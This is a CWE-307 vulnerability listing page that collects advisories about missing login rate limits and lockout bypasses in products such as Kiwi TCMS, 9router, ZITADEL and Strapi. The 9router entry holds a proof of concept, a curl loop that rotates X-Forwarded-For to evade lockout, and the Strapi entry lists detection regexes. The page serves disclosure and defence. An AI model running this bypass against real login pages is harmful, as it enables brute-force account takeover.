Common Weakness Enumeration

CWE-307

Allowed

Improper Restriction of Excessive Authentication Attempts

Abstraction: Base · Status: Draft

The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.

905 vulnerabilities reference this CWE, most recent first.

GHSA-7968-H4M4-GHM9

Vulnerability from github – Published: 2023-02-15 18:10 – Updated: 2023-02-15 18:11
VLAI
Summary
No protection against brute-force attacks on login page
Details

Impact

Previous versions of Kiwi TCMS do not impose rate limits which makes it easier to attempt brute-force attacks against the login page.

Patches

Users should upgrade to v12.0 or later.

Workarounds

Users may install and configure a rate-limiting proxy in front of Kiwi TCMS. For example nginx.

References

Disclosed by spyata

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "kiwitcms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "12.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-25156"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-02-15T18:10:54Z",
    "nvd_published_at": "2023-02-15T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nPrevious versions of Kiwi TCMS do not impose rate limits which makes it easier to attempt brute-force attacks against the login page.\n\n### Patches\nUsers should upgrade to v12.0 or later.\n\n### Workarounds\nUsers may install and configure a rate-limiting proxy in front of Kiwi TCMS. For example nginx.\n\n### References\n[Disclosed by spyata](https://huntr.dev/bounties/2b1a9be9-45e9-490b-8de0-26a492e79795/)\n",
  "id": "GHSA-7968-h4m4-ghm9",
  "modified": "2023-02-15T18:11:23Z",
  "published": "2023-02-15T18:10:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-7968-h4m4-ghm9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25156"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kiwitcms/Kiwi/commit/0ed213fa0ddb7a6dc77e3c3b99e8fc90ccdaf46f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kiwitcms/Kiwi"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/2b1a9be9-45e9-490b-8de0-26a492e79795"
    },
    {
      "type": "WEB",
      "url": "https://kiwitcms.org/blog/kiwi-tcms-team/2023/02/15/kiwi-tcms-120"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "No protection against brute-force attacks on login page"
}

GHSA-7C29-CXG2-PVWR

Vulnerability from github – Published: 2022-05-24 16:47 – Updated: 2022-12-09 18:30
VLAI
Details

IBM Intelligent Operations Center (IOC) 5.1.0 through 5.2.0 is vulnerable to user enumeration, allowing an attacker to brute force into the system. IBM X-Force ID: 157013.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-4068"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-06-07T15:29:00Z",
    "severity": "HIGH"
  },
  "details": "IBM Intelligent Operations Center (IOC) 5.1.0 through 5.2.0 is vulnerable to user enumeration, allowing an attacker to brute force into the system. IBM X-Force ID: 157013.",
  "id": "GHSA-7c29-cxg2-pvwr",
  "modified": "2022-12-09T18:30:30Z",
  "published": "2022-05-24T16:47:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-4068"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/157013"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/docview.wss?uid=ibm10880229"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7CFM-PQRJ-XGQ7

Vulnerability from github – Published: 2026-07-06 21:46 – Updated: 2026-07-06 21:46
VLAI
Summary
9router: Login brute-force protection bypass via spoofed X-Forwarded-For header
Details

Summary

The 9router dashboard login rate limiter derives the client identity from the attacker-controlled X-Forwarded-For HTTP header. When 9router is directly exposed, or deployed behind a reverse proxy that does not overwrite untrusted forwarding headers, a remote attacker can rotate the X-Forwarded-For value on each login attempt and receive a fresh rate-limit bucket every time.

This bypasses the dashboard brute-force protection and makes the login lockout mechanism ineffective.

Details

Component File Note
Dashboard login rate limiter src/lib/auth/loginLimiter.js Uses X-Forwarded-For as the client identity without a trusted-proxy check
Dashboard login route src/app/api/auth/login/route.js Calls checkLock() and recordFail() using the spoofable client identity

Vulnerable Code

src/lib/auth/loginLimiter.js:

export function getClientIp(request) {
  const xff = request.headers.get("x-forwarded-for");
  if (xff) return xff.split(",")[0].trim();
  return request.headers.get("x-real-ip") || "unknown";
}

The returned value is used as the key for the in-memory rate-limit state:

const attempts = new Map(); // ip -> { fails, lockUntil, lockLevel, lastFailAt }

The login route uses this value when checking and recording failed login attempts:

export async function POST(request) {
  const ip = getClientIp(request);
  const lock = checkLock(ip);

  if (lock.locked) {
    return NextResponse.json(
      { error: `Too many failed attempts. Try again in ${lock.retryAfter}s.` },
      { status: 429 }
    );
  }

  // ... password validation ...

  recordFail(ip);
}

Because X-Forwarded-For is accepted directly from the request, each unique header value creates a new rate-limit bucket with zero previous failures. An attacker can therefore bypass both the 5-attempt threshold and the progressive lockout durations.

PoC

Step 1 — Baseline: rate limiter triggers when the client identity is stable

Send repeated failed login attempts with the same X-Forwarded-For value:

POST /api/auth/login HTTP/1.1
Host: localhost:20128
Content-Type: application/json
X-Forwarded-For: 1.1.1.1

{"password":"wrong-password"}

Observed behavior:

Attempt Response
1 Invalid password. 4 attempt(s) left before lockout.
2 Invalid password. 3 attempt(s) left before lockout.
3 Invalid password. 2 attempt(s) left before lockout.
4 Invalid password. 1 attempt(s) left before lockout.
5 Too many failed attempts. Try again in 30s.
6 Too many failed attempts. Try again in 30s.

This confirms that the lockout logic works when all attempts are assigned to the same rate-limit bucket.

Step 2 — Bypass: rotate X-Forwarded-For on each request

Send failed login attempts while changing the X-Forwarded-For value for every request:

for i in $(seq 1 10); do
  curl -s -X POST "http://localhost:20128/api/auth/login" \
    -H "Content-Type: application/json" \
    -H "X-Forwarded-For: 10.0.0.$i" \
    -d '{"password":"wrong-password"}'
  echo
done

Observed response for every request:

{
  "error": "Invalid password. 4 attempt(s) left before lockout.",
  "remainingBeforeLock": 4
}

The counter resets to the initial state on every request, and the lockout is never triggered.

Step 3 — Impact amplifier: default dashboard password

If the instance is still using the default dashboard password, the rate-limit bypass allows an attacker to avoid lockout while attempting to authenticate.

Example request:

POST /api/auth/login HTTP/1.1
Host: localhost:20128
Content-Type: application/json
X-Forwarded-For: 99.99.99.99

{"password":"<default-dashboard-password>"}

Observed response on a default installation:

HTTP/1.1 200 OK
Set-Cookie: auth_token=<redacted>; Path=/; HttpOnly; SameSite=lax
{
  "success": true
}

The default password is an impact amplifier, not the root cause. Even if an administrator changes the password, the rate limiter remains structurally bypassable because the attacker controls the rate-limit key.

Attack Scenario

  1. A remote attacker identifies a publicly reachable 9router dashboard.
  2. The attacker sends repeated login attempts to /api/auth/login.
  3. For each attempt, the attacker changes the X-Forwarded-For header value.
  4. 9router treats each request as a different client and assigns a fresh rate-limit bucket.
  5. The attacker can continue brute-force attempts without triggering the configured lockout.
  6. If the instance uses a weak or default dashboard password, the attacker can gain administrative access.

Impact

A successful attacker can bypass the dashboard login lockout mechanism and perform unlimited brute-force attempts against the 9router dashboard password.

If authentication succeeds, the attacker can gain administrative access to the 9router dashboard and may be able to:

  • Access configured provider credentials and API keys.
  • Change dashboard and authentication settings.
  • Disable login protection if the application allows it.
  • Create persistent API keys or other long-lived access tokens.
  • Modify application configuration.
  • Chain the access with other server-side functionality exposed by the dashboard.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.4.71"
      },
      "package": {
        "ecosystem": "npm",
        "name": "9router"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.77"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55501"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290",
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-06T21:46:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe 9router dashboard login rate limiter derives the client identity from the attacker-controlled `X-Forwarded-For` HTTP header. When 9router is directly exposed, or deployed behind a reverse proxy that does not overwrite untrusted forwarding headers, a remote attacker can rotate the `X-Forwarded-For` value on each login attempt and receive a fresh rate-limit bucket every time.\n\nThis bypasses the dashboard brute-force protection and makes the login lockout mechanism ineffective.\n\n## Details\n\n| Component                    | File                              | Note                                                                        |\n| ---------------------------- | --------------------------------- | --------------------------------------------------------------------------- |\n| Dashboard login rate limiter | `src/lib/auth/loginLimiter.js`    | Uses `X-Forwarded-For` as the client identity without a trusted-proxy check |\n| Dashboard login route        | `src/app/api/auth/login/route.js` | Calls `checkLock()` and `recordFail()` using the spoofable client identity  |\n\n#### Vulnerable Code\n\n`src/lib/auth/loginLimiter.js`:\n\n```js\nexport function getClientIp(request) {\n  const xff = request.headers.get(\"x-forwarded-for\");\n  if (xff) return xff.split(\",\")[0].trim();\n  return request.headers.get(\"x-real-ip\") || \"unknown\";\n}\n```\n\nThe returned value is used as the key for the in-memory rate-limit state:\n\n```js\nconst attempts = new Map(); // ip -\u003e { fails, lockUntil, lockLevel, lastFailAt }\n```\n\nThe login route uses this value when checking and recording failed login attempts:\n\n```js\nexport async function POST(request) {\n  const ip = getClientIp(request);\n  const lock = checkLock(ip);\n\n  if (lock.locked) {\n    return NextResponse.json(\n      { error: `Too many failed attempts. Try again in ${lock.retryAfter}s.` },\n      { status: 429 }\n    );\n  }\n\n  // ... password validation ...\n\n  recordFail(ip);\n}\n```\n\nBecause `X-Forwarded-For` is accepted directly from the request, each unique header value creates a new rate-limit bucket with zero previous failures. An attacker can therefore bypass both the 5-attempt threshold and the progressive lockout durations.\n\n## PoC\n\n### Step 1 \u2014 Baseline: rate limiter triggers when the client identity is stable\n\nSend repeated failed login attempts with the same `X-Forwarded-For` value:\n\n```http\nPOST /api/auth/login HTTP/1.1\nHost: localhost:20128\nContent-Type: application/json\nX-Forwarded-For: 1.1.1.1\n\n{\"password\":\"wrong-password\"}\n```\n\nObserved behavior:\n\n| Attempt | Response                                              |\n| ------- | ----------------------------------------------------- |\n| 1       | `Invalid password. 4 attempt(s) left before lockout.` |\n| 2       | `Invalid password. 3 attempt(s) left before lockout.` |\n| 3       | `Invalid password. 2 attempt(s) left before lockout.` |\n| 4       | `Invalid password. 1 attempt(s) left before lockout.` |\n| 5       | `Too many failed attempts. Try again in 30s.`         |\n| 6       | `Too many failed attempts. Try again in 30s.`         |\n\nThis confirms that the lockout logic works when all attempts are assigned to the same rate-limit bucket.\n\n### Step 2 \u2014 Bypass: rotate `X-Forwarded-For` on each request\n\nSend failed login attempts while changing the `X-Forwarded-For` value for every request:\n\n```bash\nfor i in $(seq 1 10); do\n  curl -s -X POST \"http://localhost:20128/api/auth/login\" \\\n    -H \"Content-Type: application/json\" \\\n    -H \"X-Forwarded-For: 10.0.0.$i\" \\\n    -d \u0027{\"password\":\"wrong-password\"}\u0027\n  echo\ndone\n```\n\nObserved response for every request:\n\n```json\n{\n  \"error\": \"Invalid password. 4 attempt(s) left before lockout.\",\n  \"remainingBeforeLock\": 4\n}\n```\n\nThe counter resets to the initial state on every request, and the lockout is never triggered.\n\n### Step 3 \u2014 Impact amplifier: default dashboard password\n\nIf the instance is still using the default dashboard password, the rate-limit bypass allows an attacker to avoid lockout while attempting to authenticate.\n\nExample request:\n\n```http\nPOST /api/auth/login HTTP/1.1\nHost: localhost:20128\nContent-Type: application/json\nX-Forwarded-For: 99.99.99.99\n\n{\"password\":\"\u003cdefault-dashboard-password\u003e\"}\n```\n\nObserved response on a default installation:\n\n```http\nHTTP/1.1 200 OK\nSet-Cookie: auth_token=\u003credacted\u003e; Path=/; HttpOnly; SameSite=lax\n```\n\n```json\n{\n  \"success\": true\n}\n```\n\nThe default password is an impact amplifier, not the root cause. Even if an administrator changes the password, the rate limiter remains structurally bypassable because the attacker controls the rate-limit key.\n\n## Attack Scenario\n\n1. A remote attacker identifies a publicly reachable 9router dashboard.\n2. The attacker sends repeated login attempts to `/api/auth/login`.\n3. For each attempt, the attacker changes the `X-Forwarded-For` header value.\n4. 9router treats each request as a different client and assigns a fresh rate-limit bucket.\n5. The attacker can continue brute-force attempts without triggering the configured lockout.\n6. If the instance uses a weak or default dashboard password, the attacker can gain administrative access.\n\n## Impact\n\nA successful attacker can bypass the dashboard login lockout mechanism and perform unlimited brute-force attempts against the 9router dashboard password.\n\nIf authentication succeeds, the attacker can gain administrative access to the 9router dashboard and may be able to:\n\n* Access configured provider credentials and API keys.\n* Change dashboard and authentication settings.\n* Disable login protection if the application allows it.\n* Create persistent API keys or other long-lived access tokens.\n* Modify application configuration.\n* Chain the access with other server-side functionality exposed by the dashboard.",
  "id": "GHSA-7cfm-pqrj-xgq7",
  "modified": "2026-07-06T21:46:20Z",
  "published": "2026-07-06T21:46:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/decolua/9router/security/advisories/GHSA-7cfm-pqrj-xgq7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/decolua/9router"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "9router: Login brute-force protection bypass via spoofed X-Forwarded-For header"
}

GHSA-7CQ6-GV65-J962

Vulnerability from github – Published: 2024-08-13 09:30 – Updated: 2024-08-13 09:30
VLAI
Details

A vulnerability has been identified in SINEC Traffic Analyzer (6GK8822-1BG01-0BA0) (All versions < V2.0). The affected application do not properly enforce restriction of excessive authentication attempts. This could allow an unauthenticated attacker to conduct brute force attacks against legitimate user credentials or keys.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-41904"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-13T08:15:13Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability has been identified in SINEC Traffic Analyzer (6GK8822-1BG01-0BA0) (All versions \u003c V2.0). The affected application do not properly enforce restriction of  excessive authentication attempts. This could allow an unauthenticated attacker to conduct brute force attacks against legitimate user credentials or keys.",
  "id": "GHSA-7cq6-gv65-j962",
  "modified": "2024-08-13T09:30:52Z",
  "published": "2024-08-13T09:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41904"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-716317.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-7F55-8M7R-49X9

Vulnerability from github – Published: 2022-05-24 16:50 – Updated: 2024-04-04 01:16
VLAI
Details

A security feature bypass vulnerability exists in Active Directory Federation Services (ADFS) which could allow an attacker to bypass the extranet lockout policy.To exploit this vulnerability, an attacker could run a specially crafted application, which would allow an attacker to launch a password brute-force attack or cause account lockouts in Active Directory.This security update corrects how ADFS handles external authentication requests., aka 'ADFS Security Feature Bypass Vulnerability'. This CVE ID is unique from CVE-2019-0975.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-1126"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-07-15T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A security feature bypass vulnerability exists in Active Directory Federation Services (ADFS) which could allow an attacker to bypass the extranet lockout policy.To exploit this vulnerability, an attacker could run a specially crafted application, which would allow an attacker to launch a password brute-force attack or cause account lockouts in Active Directory.This security update corrects how ADFS handles external authentication requests., aka \u0027ADFS Security Feature Bypass Vulnerability\u0027. This CVE ID is unique from CVE-2019-0975.",
  "id": "GHSA-7f55-8m7r-49x9",
  "modified": "2024-04-04T01:16:28Z",
  "published": "2022-05-24T16:50:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1126"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1126"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7F8F-7V7X-VQ93

Vulnerability from github – Published: 2022-10-18 19:00 – Updated: 2022-10-21 12:00
VLAI
Details

An improper restriction of excessive authentication attempts vulnerability [CWE-307] in FortiTester Telnet port 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated attacker to guess the credentials of an admin user via a brute force attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-35846"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-18T14:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "An improper restriction of excessive authentication attempts vulnerability [CWE-307] in FortiTester Telnet port 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated attacker to guess the credentials of an admin user via a brute force attack.",
  "id": "GHSA-7f8f-7v7x-vq93",
  "modified": "2022-10-21T12:00:22Z",
  "published": "2022-10-18T19:00:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35846"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/psirt/FG-IR-22-244"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7J7J-66CV-M239

Vulnerability from github – Published: 2024-04-25 18:31 – Updated: 2024-11-18 16:26
VLAI
Summary
ZITADEL's Improper Lockout Mechanism Leads to MFA Bypass
Details

Impact

ZITADEL provides users the possibility to use Time-based One-Time-Password (TOTP) and One-Time-Password (OTP) through SMS and Email.

While ZITADEL already gives administrators the option to define a Lockout Policy with a maximum amount of failed password check attempts, there was no such mechanism for (T)OTP checks.

Patches

2.x versions are fixed on >= 2.50.0

Workarounds

There is no workaround since a patch is already available.

References

None

Questions

If you have any questions or comments about this advisory, please email us at security@zitadel.com

Credits

Thanks to Jack Moran from Layer 9 Information Security, Ethan from zxsecurity and Amit Laish from GE Vernova for finding and reporting the vulnerability.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/zitadel/zitadel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.50.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-32868"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-297",
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-25T18:31:31Z",
    "nvd_published_at": "2024-04-26T00:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nZITADEL provides users the possibility to use Time-based One-Time-Password (TOTP) and One-Time-Password (OTP) through SMS and Email.\n\nWhile ZITADEL already gives administrators the option to define a `Lockout Policy` with a maximum amount of failed password check attempts, there was no such mechanism for (T)OTP checks.\n\n### Patches\n2.x versions are fixed on \u003e= [2.50.0](https://github.com/zitadel/zitadel/releases/tag/v2.50.0)\n\n### Workarounds\nThere is no workaround since a patch is already available.\n\n### References\nNone\n\n### Questions\nIf you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)\n\n### Credits\n\nThanks to Jack Moran from Layer 9 Information Security, Ethan from zxsecurity and Amit Laish from GE Vernova for finding and reporting the vulnerability. \n",
  "id": "GHSA-7j7j-66cv-m239",
  "modified": "2024-11-18T16:26:40Z",
  "published": "2024-04-25T18:31:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-7j7j-66cv-m239"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32868"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zitadel/zitadel"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zitadel/zitadel/releases/tag/v2.50.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "ZITADEL\u0027s Improper Lockout Mechanism Leads to MFA Bypass"
}

GHSA-7MJM-6675-W446

Vulnerability from github – Published: 2022-05-24 17:13 – Updated: 2022-05-24 17:13
VLAI
Details

An issue was discovered in Pulse Secure Pulse Connect Secure (PCS) through 2020-04-06. The applet in tncc.jar, executed on macOS, Linux, and Solaris clients when a Host Checker policy is enforced, launches a TCP server that accepts local connections on a random port. This can be reached by local HTTP clients, because up to 25 invalid lines are ignored, and because DNS rebinding can occur. (This server accepts, for example, a setcookie command that might be relevant to CVE-2020-11581 exploitation.)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-11582"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307",
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-04-06T21:15:00Z",
    "severity": "LOW"
  },
  "details": "An issue was discovered in Pulse Secure Pulse Connect Secure (PCS) through 2020-04-06. The applet in tncc.jar, executed on macOS, Linux, and Solaris clients when a Host Checker policy is enforced, launches a TCP server that accepts local connections on a random port. This can be reached by local HTTP clients, because up to 25 invalid lines are ignored, and because DNS rebinding can occur. (This server accepts, for example, a setcookie command that might be relevant to CVE-2020-11581 exploitation.)",
  "id": "GHSA-7mjm-6675-w446",
  "modified": "2022-05-24T17:13:25Z",
  "published": "2022-05-24T17:13:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11582"
    },
    {
      "type": "WEB",
      "url": "https://git.lsd.cat/g/pulse-host-checker-rce"
    },
    {
      "type": "WEB",
      "url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44426"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-7MQX-WWH4-F9FW

Vulnerability from github – Published: 2026-05-13 20:02 – Updated: 2026-05-15 23:44
VLAI
Summary
Strapi has a rate limit bypass on users-permissions plugin via attacker-controlled email keying
Details

Summary of CVE-2025-64526 Vulnerability Details

  • CVE: CVE-2025-64526
  • CVSS v3.1 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N (6.9 — Medium)
  • Affected Versions: @strapi/plugin-users-permissions <=5.44.0
  • How to Patch: Immediately update your Strapi to >=5.45.0

Description of CVE-2025-64526

In Strapi versions prior to 5.45.0, the rate-limit middleware in the users-permissions plugin derived its rate-limit key in part from ctx.request.body.email, including on routes whose body schema does not contain an email field (/auth/local, /auth/reset-password, /auth/change-password). An unauthenticated attacker could include an arbitrary email value in the request body to obtain a fresh rate-limit key per request, effectively bypassing per-IP throttling on those routes and enabling high-volume credential brute-force, password-reset code brute-force, and credential-stuffing attempts.

The rate-limit key was constructed as ${userIdentifier}:${requestPath}:${ctx.request.ip}, where userIdentifier = ctx.request.body.email. On routes that legitimately use email as their identifier (e.g. /auth/forgot-password, /auth/local/register), this scoping is correct. On routes that use a different identifier (identifier for login, code for password reset, currentPassword for password change), the email field was not part of the route contract, but the middleware still incorporated it into the key, allowing a caller to rotate the value and obtain a unique key on every request.

The patch maintains an allow-list of routes that legitimately key on the email field and excludes that key component on every other route the middleware is mounted on. OAuth callback paths (/connect/*) are treated identifier-less. On routes outside the allow-list, the middleware now falls back to a fixed identifier-less key, ensuring per-IP throttling remains effective even when the request body is attacker-controlled.

IoC's for CVE-2025-64526

Indicators that an instance running an unpatched version may have been exploited:

  • Unusually high volumes of POST requests to /api/auth/local, /api/auth/reset-password, or /api/auth/change-password from a single IP within a 5-minute window without 429 (Too Many Requests) responses
  • Request bodies on /api/auth/local containing both identifier AND email fields where email varies per request. Body shape regex: "identifier"\s*:\s*"[^"]*",\s*"email"\s*:\s*"[^"]*"
  • Request bodies on /api/auth/reset-password containing an unexpected email field alongside code. Body shape regex: "code"\s*:\s*"[^"]*",.*"email"\s*:
  • Server logs showing many distinct rate-limit key prefixes for the same IP+route combination within the rate-limit window
  • Successful authentication or password reset following hundreds of preceding 401/400 responses from the same IP
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.44.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@strapi/plugin-users-permissions"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.45.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-13T20:02:15Z",
    "nvd_published_at": "2026-05-14T19:16:29Z",
    "severity": "MODERATE"
  },
  "details": "### Summary of CVE-2025-64526 Vulnerability Details\n\n- CVE: CVE-2025-64526\n- CVSS v3.1 Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N` (6.9 \u2014 Medium)\n- Affected Versions: `@strapi/plugin-users-permissions` \u003c=5.44.0\n- How to Patch: Immediately update your Strapi to \u003e=5.45.0\n\n### Description of CVE-2025-64526\n\nIn Strapi versions prior to 5.45.0, the rate-limit middleware in the users-permissions plugin derived its rate-limit key in part from `ctx.request.body.email`, including on routes whose body schema does not contain an `email` field (`/auth/local`, `/auth/reset-password`, `/auth/change-password`). An unauthenticated attacker could include an arbitrary `email` value in the request body to obtain a fresh rate-limit key per request, effectively bypassing per-IP throttling on those routes and enabling high-volume credential brute-force, password-reset code brute-force, and credential-stuffing attempts.\n\nThe rate-limit key was constructed as `${userIdentifier}:${requestPath}:${ctx.request.ip}`, where `userIdentifier = ctx.request.body.email`. On routes that legitimately use email as their identifier (e.g. `/auth/forgot-password`, `/auth/local/register`), this scoping is correct. On routes that use a different identifier (`identifier` for login, `code` for password reset, `currentPassword` for password change), the email field was not part of the route contract, but the middleware still incorporated it into the key, allowing a caller to rotate the value and obtain a unique key on every request.\n\nThe patch maintains an allow-list of routes that legitimately key on the email field and excludes that key component on every other route the middleware is mounted on. OAuth callback paths (`/connect/*`) are treated identifier-less. On routes outside the allow-list, the middleware now falls back to a fixed identifier-less key, ensuring per-IP throttling remains effective even when the request body is attacker-controlled.\n\n### IoC\u0027s for CVE-2025-64526\n\nIndicators that an instance running an unpatched version may have been exploited:\n\n- Unusually high volumes of `POST` requests to `/api/auth/local`, `/api/auth/reset-password`, or `/api/auth/change-password` from a single IP within a 5-minute window without 429 (Too Many Requests) responses\n- Request bodies on `/api/auth/local` containing both `identifier` AND `email` fields where `email` varies per request. Body shape regex: `\"identifier\"\\s*:\\s*\"[^\"]*\",\\s*\"email\"\\s*:\\s*\"[^\"]*\"`\n- Request bodies on `/api/auth/reset-password` containing an unexpected `email` field alongside `code`. Body shape regex: `\"code\"\\s*:\\s*\"[^\"]*\",.*\"email\"\\s*:`\n- Server logs showing many distinct rate-limit key prefixes for the same IP+route combination within the rate-limit window\n- Successful authentication or password reset following hundreds of preceding 401/400 responses from the same IP",
  "id": "GHSA-7mqx-wwh4-f9fw",
  "modified": "2026-05-15T23:44:20Z",
  "published": "2026-05-13T20:02:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-7mqx-wwh4-f9fw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64526"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/pull/24818"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/commit/5e0d243cba9830e6f791de6a94798bcde51468db"
    },
    {
      "type": "PACKAGE",
